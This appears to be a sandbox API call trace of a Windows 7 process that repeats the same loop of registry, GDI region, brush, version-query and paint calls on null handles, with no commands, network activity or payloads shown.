[0092.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.443] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe80401d9 [0092.443] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe60401dc [0092.443] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104789e [0092.443] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104789f [0092.443] CombineRgn (hrgnDst=0x104789e, hrgnSrc1=0xe80401d9, hrgnSrc2=0xe60401dc, iMode=1) returned 1 [0092.443] CombineRgn (hrgnDst=0x104789f, hrgnSrc1=0xe80401d9, hrgnSrc2=0xe60401dc, iMode=4) returned 2 [0092.443] CreateSolidBrush (color=0xff) returned 0x210789d [0092.443] CreateSolidBrush (color=0xff0000) returned 0x11078a0 [0092.443] DeleteObject (ho=0x11078a0) returned 1 [0092.443] DeleteObject (ho=0xe60401dc) returned 1 [0092.443] DeleteObject (ho=0xe80401d9) returned 1 [0092.443] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.443] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.443] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.443] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.443] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.443] BeginPath (hdc=0x0) returned 0 [0092.443] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.443] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.443] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.443] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.443] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.443] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.443] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.443] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.444] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe70401dc [0092.444] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe90401d9 [0092.444] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478a1 [0092.444] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478a2 [0092.444] CombineRgn (hrgnDst=0x10478a1, hrgnSrc1=0xe70401dc, hrgnSrc2=0xe90401d9, iMode=1) returned 1 [0092.444] CombineRgn (hrgnDst=0x10478a2, hrgnSrc1=0xe70401dc, hrgnSrc2=0xe90401d9, iMode=4) returned 2 [0092.444] CreateSolidBrush (color=0xff) returned 0x21078a0 [0092.444] CreateSolidBrush (color=0xff0000) returned 0x11078a3 [0092.444] DeleteObject (ho=0x11078a3) returned 1 [0092.444] DeleteObject (ho=0xe90401d9) returned 1 [0092.444] DeleteObject (ho=0xe70401dc) returned 1 [0092.444] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.444] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.444] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.444] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.444] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.444] BeginPath (hdc=0x0) returned 0 [0092.444] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.444] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.444] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.444] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.444] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.444] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.444] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.444] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.445] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea0401d9 [0092.445] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe80401dc [0092.445] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478a4 [0092.445] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478a5 [0092.445] CombineRgn (hrgnDst=0x10478a4, hrgnSrc1=0xea0401d9, hrgnSrc2=0xe80401dc, iMode=1) returned 1 [0092.445] CombineRgn (hrgnDst=0x10478a5, hrgnSrc1=0xea0401d9, hrgnSrc2=0xe80401dc, iMode=4) returned 2 [0092.445] CreateSolidBrush (color=0xff) returned 0x21078a3 [0092.445] CreateSolidBrush (color=0xff0000) returned 0x11078a6 [0092.445] DeleteObject (ho=0x11078a6) returned 1 [0092.445] DeleteObject (ho=0xe80401dc) returned 1 [0092.445] DeleteObject (ho=0xea0401d9) returned 1 [0092.445] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.445] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.445] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.445] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.445] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.445] BeginPath (hdc=0x0) returned 0 [0092.445] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.445] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.445] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.445] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.445] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.445] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.445] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.445] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.445] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe90401dc [0092.445] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb0401d9 [0092.445] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478a7 [0092.446] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478a8 [0092.446] CombineRgn (hrgnDst=0x10478a7, hrgnSrc1=0xe90401dc, hrgnSrc2=0xeb0401d9, iMode=1) returned 1 [0092.446] CombineRgn (hrgnDst=0x10478a8, hrgnSrc1=0xe90401dc, hrgnSrc2=0xeb0401d9, iMode=4) returned 2 [0092.446] CreateSolidBrush (color=0xff) returned 0x21078a6 [0092.446] CreateSolidBrush (color=0xff0000) returned 0x11078a9 [0092.446] DeleteObject (ho=0x11078a9) returned 1 [0092.446] DeleteObject (ho=0xeb0401d9) returned 1 [0092.446] DeleteObject (ho=0xe90401dc) returned 1 [0092.446] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.446] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.446] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.446] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.446] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.446] BeginPath (hdc=0x0) returned 0 [0092.446] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.446] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.446] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.446] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.446] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.446] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.446] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.446] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec0401d9 [0092.446] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea0401dc [0092.446] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478aa [0092.446] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ab [0092.446] CombineRgn (hrgnDst=0x10478aa, hrgnSrc1=0xec0401d9, hrgnSrc2=0xea0401dc, iMode=1) returned 1 [0092.446] CombineRgn (hrgnDst=0x10478ab, hrgnSrc1=0xec0401d9, hrgnSrc2=0xea0401dc, iMode=4) returned 2 [0092.446] CreateSolidBrush (color=0xff) returned 0x21078a9 [0092.447] CreateSolidBrush (color=0xff0000) returned 0x11078ac [0092.447] DeleteObject (ho=0x11078ac) returned 1 [0092.447] DeleteObject (ho=0xea0401dc) returned 1 [0092.447] DeleteObject (ho=0xec0401d9) returned 1 [0092.447] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.447] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.447] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.447] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.447] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.447] BeginPath (hdc=0x0) returned 0 [0092.447] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.447] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.447] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.447] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.447] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.447] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.447] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.447] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb0401dc [0092.447] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed0401d9 [0092.447] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ad [0092.447] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ae [0092.447] CombineRgn (hrgnDst=0x10478ad, hrgnSrc1=0xeb0401dc, hrgnSrc2=0xed0401d9, iMode=1) returned 1 [0092.447] CombineRgn (hrgnDst=0x10478ae, hrgnSrc1=0xeb0401dc, hrgnSrc2=0xed0401d9, iMode=4) returned 2 [0092.447] CreateSolidBrush (color=0xff) returned 0x21078ac [0092.447] CreateSolidBrush (color=0xff0000) returned 0x11078af [0092.447] DeleteObject (ho=0x11078af) returned 1 [0092.448] DeleteObject (ho=0xed0401d9) returned 1 [0092.448] DeleteObject (ho=0xeb0401dc) returned 1 [0092.448] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.448] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.448] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.448] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.448] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.448] BeginPath (hdc=0x0) returned 0 [0092.448] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.448] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.448] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.448] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.448] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.448] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.448] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.448] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee0401d9 [0092.448] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec0401dc [0092.448] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b0 [0092.448] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b1 [0092.448] CombineRgn (hrgnDst=0x10478b0, hrgnSrc1=0xee0401d9, hrgnSrc2=0xec0401dc, iMode=1) returned 1 [0092.448] CombineRgn (hrgnDst=0x10478b1, hrgnSrc1=0xee0401d9, hrgnSrc2=0xec0401dc, iMode=4) returned 2 [0092.448] CreateSolidBrush (color=0xff) returned 0x21078af [0092.448] CreateSolidBrush (color=0xff0000) returned 0x11078b2 [0092.449] DeleteObject (ho=0x11078b2) returned 1 [0092.449] DeleteObject (ho=0xec0401dc) returned 1 [0092.449] DeleteObject (ho=0xee0401d9) returned 1 [0092.449] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.449] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.449] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.449] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.449] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.449] BeginPath (hdc=0x0) returned 0 [0092.449] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.449] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.449] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.449] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.449] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.449] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.449] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.449] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed0401dc [0092.449] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef0401d9 [0092.449] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b3 [0092.449] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b4 [0092.449] CombineRgn (hrgnDst=0x10478b3, hrgnSrc1=0xed0401dc, hrgnSrc2=0xef0401d9, iMode=1) returned 1 [0092.449] CombineRgn (hrgnDst=0x10478b4, hrgnSrc1=0xed0401dc, hrgnSrc2=0xef0401d9, iMode=4) returned 2 [0092.449] CreateSolidBrush (color=0xff) returned 0x21078b2 [0092.449] CreateSolidBrush (color=0xff0000) returned 0x11078b5 [0092.449] DeleteObject (ho=0x11078b5) returned 1 [0092.449] DeleteObject (ho=0xef0401d9) returned 1 [0092.449] DeleteObject (ho=0xed0401dc) returned 1 [0092.449] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.449] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.450] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.450] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.450] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.450] BeginPath (hdc=0x0) returned 0 [0092.450] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.450] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.450] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.450] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.450] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.450] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.450] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.450] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.450] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf00401d9 [0092.450] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee0401dc [0092.450] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b6 [0092.450] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b7 [0092.450] CombineRgn (hrgnDst=0x10478b6, hrgnSrc1=0xf00401d9, hrgnSrc2=0xee0401dc, iMode=1) returned 1 [0092.450] CombineRgn (hrgnDst=0x10478b7, hrgnSrc1=0xf00401d9, hrgnSrc2=0xee0401dc, iMode=4) returned 2 [0092.450] CreateSolidBrush (color=0xff) returned 0x21078b5 [0092.450] CreateSolidBrush (color=0xff0000) returned 0x11078b8 [0092.450] DeleteObject (ho=0x11078b8) returned 1 [0092.450] DeleteObject (ho=0xee0401dc) returned 1 [0092.450] DeleteObject (ho=0xf00401d9) returned 1 [0092.450] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.450] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.451] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.451] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.451] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.451] BeginPath (hdc=0x0) returned 0 [0092.451] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.451] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.451] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.451] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.451] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.451] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.451] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.451] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.451] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef0401dc [0092.451] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf10401d9 [0092.451] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478b9 [0092.451] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ba [0092.451] CombineRgn (hrgnDst=0x10478b9, hrgnSrc1=0xef0401dc, hrgnSrc2=0xf10401d9, iMode=1) returned 1 [0092.451] CombineRgn (hrgnDst=0x10478ba, hrgnSrc1=0xef0401dc, hrgnSrc2=0xf10401d9, iMode=4) returned 2 [0092.451] CreateSolidBrush (color=0xff) returned 0x21078b8 [0092.451] CreateSolidBrush (color=0xff0000) returned 0x11078bb [0092.451] DeleteObject (ho=0x11078bb) returned 1 [0092.451] DeleteObject (ho=0xf10401d9) returned 1 